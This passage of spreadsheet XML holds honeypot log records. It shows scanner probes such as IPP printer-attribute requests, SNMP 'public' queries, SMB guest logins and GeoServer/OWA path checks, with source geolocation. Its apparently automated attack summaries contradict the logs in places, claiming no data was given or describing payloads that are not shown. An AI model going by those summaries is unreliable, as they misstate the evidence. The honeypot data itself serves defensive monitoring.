all'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.60.209.6:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.224.106:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '144.126.148.5:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://144.126.148.5:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://45.14.244.111:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '209.145.61.177:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://209.145.61.177:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.901 Yowser/2.5  Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.4.3.0 1.3.6.1.2.1.4.10.0', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.40.123:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '185.74.222.213:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.74.222.213:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.118.77:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '203.29.241.98:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '103.113.68.70:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://103.113.68.70:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.136.113:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://193.57.136.113:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.171.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '66.94.127.183:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://193.57.138.110:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36', 'method': 'GET', 'uri': '/owa/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.54.63.23:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.63.23:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.79.122:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.79.122:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.93.37.45:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.8.76:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.43.207:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.43.207:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78', 'method': 'GET', 'uri': '/geoserver/web/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.54.116.162:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SMB:Incoming connection (64.62.197.47,44755)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.42.176:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.42.176:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 OPR/107.0.0.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '194.4.48.242:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.115.66:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:403e:c52f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Here are the possible malicious activities and corresponding attack types: &amp;&amp; No available log data provided. _x000a_Activity cannot be determined from this information. _x000a_Data is incomplete for analysis. &amp;&amp; An unknown IP is sending a request to obtain the attributes of a printer, specifically asking for its natural language and charset settings. This could be a reconnaissance attempt by an attacker to map out available printers on the network. The request also includes the printer's URI, which may indicate further malicious intentions. &amp;&amp; Possible malicious activity involves a POST request to print services on a remote system, potentially attempting unauthorized printing or data extraction. The User-Agent suggests a scripted or automated tool is being used. The request includes encoded content and a large payload. &amp;&amp; An IP address from 194.4.48.242 is sending a POST request to a server with an unusual content type, likely attempting to exploit the IPP service for malicious purposes. The request contains encoded data and a user agent that mimics a legitimate browser, indicating potential spoofing or tampering activities. &amp;&amp; No log activity detected for Redis service, suggesting potential attempt to access or exploit it was unsuccessful. This could indicate an attacker trying to use the honeypot's Redis service without success. No malicious action was actually performed. &amp;&amp; The data indicates potential malicious access attempts, specifically unauthorized interactions with Redis services, suggesting possible scanning or exploitation activities. The presence of unknown data values suggests incomplete or failed connections, which could be indicative of malicious probing. This may indicate reconnaissance efforts to identify vulnerable systems. &amp;&amp; No log data provided, unable to analyze or describe any malicious activity. &amp;&amp; There is no log data provided, so there is nothing to analyze. _x000a_This means that we have no information about potential malicious activity._x000a_No activity can be inferred or detected from this data. &amp;&amp; Possible malicious activity is an attacker attempting to retrieve sensitive information about a networked printer, including its location and capabilities. This could be used for reconnaissance or targeted attacks on the printer system. The request appears to be legitimate but may be a probe for further exploitation. &amp;&amp; No data provided, unable to analyze. &amp;&amp; No attempts were made to access LDAP service, suggesting normal operation or security measures preventing potential malicious activity. No suspicious connections detected for this service at this time, which is a positive sign. The lack of activity is not necessarily indicative of malicious intent. &amp;&amp; There is incomplete or missing data for LDAP service, suggesting potential scanning activity._x000a_This could be an indication of reconnaissance by attackers to identify vulnerabilities._x000a_No malicious interaction occurred yet."/>
    <s v="I don't have log data provided, but I can guide you through how to analyze such data. _x000a__x000a_If you provide me with some sample log data, I'd be happy to help you identify the type of attack for each entry._x000a__x000a_However, based on common honeypot attacks, here are a few examples:_x000a__x000a_* **Brute Force SSH**: Attempting multiple login attempts with various passwords._x000a_* **Port Scanner**: Scanning open ports to find vulnerable services._x000a_* **SQL Injection**: Trying to inject malicious SQL code into databases._x000a_* **DDoS Attack**: Sending high amounts of traffic to overwhelm the server._x000a__x000a_Please provide some sample log data for me to analyze. &amp;&amp; IP Scanning &amp;&amp; Redis Attack &amp;&amp; Port Scan &amp;&amp; I need to see the log data to analyze it. Please provide the log data, and I'll classify each entry with a short phrase describing the type of attack. &amp;&amp; Port Scan &amp;&amp; LDAP Attack &amp;&amp; LDAP Attack"/>
  </r>
  <r>
    <x v="202"/>
    <x v="202"/>
    <s v="110-24-32-12.adsl.fetnet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:10:39"/>
    <d v="2024-07-11T18:46:00"/>
    <d v="2025-04-30T10:10:39"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="22&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Banqiao District"/>
    <s v="1670029"/>
    <s v="NA"/>
    <s v="25.0114"/>
    <s v="121.462"/>
    <s v="9674"/>
    <s v="Far EastTone Telecommunication Co., Ltd."/>
    <s v="Far EasTone Telecommunication Co., Ltd."/>
    <s v="residential"/>
    <s v="FETNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e18:200c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="203"/>
    <x v="203"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:10:31"/>
    <d v="2023-10-01T21:50:00"/>
    <d v="2025-04-30T10:10:31"/>
    <n v="351"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;80&amp;&amp;3306&amp;&amp;15607&amp;&amp;21&amp;&amp;445&amp;&amp;50264&amp;&amp;50766&amp;&amp;6379&amp;&amp;1521&amp;&amp;39696&amp;&amp;161&amp;&amp;5900&amp;&amp;NA&amp;&amp;110&amp;&amp;6667"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="NA"/>
    <s v="Bangkok"/>
    <s v="1609350"/>
    <s v="10700"/>
    <s v="13.7563"/>
    <s v="100.502"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="Ucloud Information Technology (hk) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;command&amp;&amp;login&amp;&amp;NA&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,55520)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,38692)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,57438)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,36178)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,94.131.8.76)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52826)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52834)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52850)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,52858)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,41200)}&amp;&amp;{Data_SMB:Incoming connection (118.194.250.31,41216)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IRC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76c2:fa1f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is no log data provided, therefore there is nothing to analyze or describe regarding possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="204"/>
    <x v="204"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:10:30"/>
    <d v="2024-01-14T12:02:11"/>
